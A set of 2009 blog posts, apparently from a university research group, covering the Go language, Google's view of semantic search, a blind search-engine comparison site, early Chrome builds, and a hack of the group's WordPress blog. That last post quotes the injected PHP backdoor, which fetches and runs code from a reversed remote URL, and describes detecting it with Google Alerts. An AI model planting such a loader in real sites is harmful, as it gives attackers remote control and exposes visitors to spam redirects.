November 12th, 2009
Mark Chu-Carroll is a Google software engineer who’s written a long, detailed and informed review of Google’s new programming language Go. It’s worth a read if you are interested in understanding what it’s like as a programming language. Here’s a few points that I took note of.
“The guys who designed Go were very focused on keeping things as small and simple as possible. When you look at it in contrast to a language like C++, it’s absolutely striking. Go is very small, and very simple. There’s no cruft. No redundancy. Everything has been pared down. But for the most part, they give you what you need. If you want a C-like language with some basic object-oriented features and garbage collection, Go is about as simple as you could realistically hope to get.”
“The most innovative thing about it is its type system. … It ends up giving you something with the flavor of Python-ish duck typing, but with full type-checking from the compiler.”
“Go programs compile really astonishingly quickly. When I first tried it, I thought that I had made a mistake building the compiler. It was just too damned fast. I’d never seen anything quite like it.”
“At the end of the day, what do I think? I like Go, but I don’t love it. If it had generics, it would definitely be my favorite of the C/C++/C#/Java family. It’s got a very elegant simplicity to it which I really like. The interface type system is wonderful. The overall structure of programs and modules is excellent. But it’s got some ugliness. … It’s not going to wipe C++ off the face of the earth. But I think it will establish itself as a solid alternative.”
Go sounds like a language that will help you grow as a computer scientist if you use it. That’s a good enough recommendation for me.
November 11th, 2009
PCWorld has a story, Google VP Mayer Describes the Perfect Search Engine, with some interesting comments on semantic search from Marissa Mayer, Google’s vice president of Search Products & User Experience.
“IDGNS: What’s the status of semantic search at Google? You have said in the past that through “brute force” — analyzing massive amounts of queries and Web content — Google’s engine can deliver results that make it seem as if it understood things semantically, when it really functions using other algorithmic approaches. Is that still the preferred approach?
Mayer: We believe in building intelligent systems that learn off of data in an automated way, [and then] tuning and refining them. When people talk about semantic search and the semantic Web, they usually mean something that is very manual, with maps of various associations between words and things like that. We think you can get to a much better level of understanding through pattern-matching data, building large-scale systems. That’s how the brain works. That’s why you have all these fuzzy connections, because the brain is constantly processing lots and lots of data all the time.
IDGNS: A couple of years ago or so, some experts were predicting that semantic technology would revolutionize search and blindside Google, but that hasn’t happened. It seems that semantic search efforts have hit a wall, especially because semantic engines are hard to scale.
Mayer: The problem is that language changes. Web pages change. How people express themselves changes. And all those things matter in terms of how well semantic search applies. That’s why it’s better to have an approach that’s based on machine learning and that changes, iterates and responds to the data. That’s a more robust approach. That’s not to say that semantic search has no part in search. It’s just that for us, we really prefer to focus on things that can scale. If we could come up with a semantic search solution that could scale, we would be very excited about that. For now, what we’re seeing is that a lot of our methods approximate the intelligence of semantic search but do it through other means.”
I interpret these comments to mean that Google’s management still views the concept of semantic search (and the Semantic Web) as involving better understanding of the intended meaning of text in documents and queries. The W3C’s web of data model is still not on their radar.
June 7th, 2009
Who’s got the best basic web search engine? One way to approach that question is to conduct an experiment in which subjects rank the results returned by several engines without knowing which is which.
BlindSearch is a simple and neat site that collects ‘objective’ opinions on search quality by showing query results from Google, Yahoo and Bing side by side without identifying which is which and inviting you to select the best.
“Type in a search query above, hit search then vote for the column which you believe best matches your query. The columns are randomised with every query.
The goal of this site is simple, we want to see what happens when you remove the branding from search engines. How differently will you perceive the results?”
As of this writing there have been 1679 votes for preferred results with Google getting 39%, Bing 39% and Yahoo: 22%.
update 2:14pm edt 6/7: Google: 45%, Bing: 32%, Yahoo: 22% | 11,130 votes
June 5th, 2009
How’s this for truth in advertising. The Chromium blog announces beta versions of Google Chrome for MAC OS X and Linus, but warns people not to try them in a post Danger: Mac and Linux builds available.
“In order to get more feedback from developers, we have early developer channel versions of Google Chrome for Mac OS X and Linux, but whatever you do, please DON’T DOWNLOAD THEM! Unless of course you are a developer or take great pleasure in incomplete, unpredictable, and potentially crashing software. How incomplete? So incomplete that, among other things, you won’t yet be able to view YouTube videos, change your privacy settings, set your default search provider, or even print.”
Of course, they know that this will make trying them irresistible to some of us. If that includes you, go get the Mac or Linux version.
May 21st, 2009
Yesterday we discovered that our ebiquity blog had been hacked. It looks like a vulnerability in our old WordPress installation was exploited to add the following code to the top of our blog’s main page.
< ?php $site = create_function('','$cachedir="/tmp/"; $param="qq"; $key=$_GET[$param]; $rand="1239aef"; $said=23; $type=1; $stprot="http://blogwp.info"; '.file_get_contents(strrev("txt.mrahp/elpmaxe/deliated/ofni.pwgolb//:ptth"))); $site(); ?>
This code caused URLs like https://ebiquity.umbc.edu/?qq=1671 to redirect to a spam page. We’ve upgraded the blog to the latest WordPress release, which hopefully will prevent this exploit from being used again. (Notice the reversed URL — LOL!)
We discovered the problem though a clever trick I read about last year on a site I’ve forgotten (maybe here). We created several Google alerts triggered by the appearance of spam-related words on pages apparently hosted by ebiquity.umbc.edu. For example:
- adult OR girls OR sex OR sexx OR XXX OR porn OR pornography site:ebiquity.umbc.edu
- viagra OR cialis OR levitra OR Phentermine OR Xanax site:ebiquity.umbc.edu
I would get several false positives a month from these alerts triggered by non-spam entries on our site. In fact, *this* post will generate a false positive. But yesterday I got a true positive. Looking at the log files, I think I got the alert within a few hours of when our blog was hacked. So I am happy to say that this worked and worked well. Without this alert, it might have taken weeks to notice the problem.
The results of this Google search reveal many compromised blogs from the .edu domain.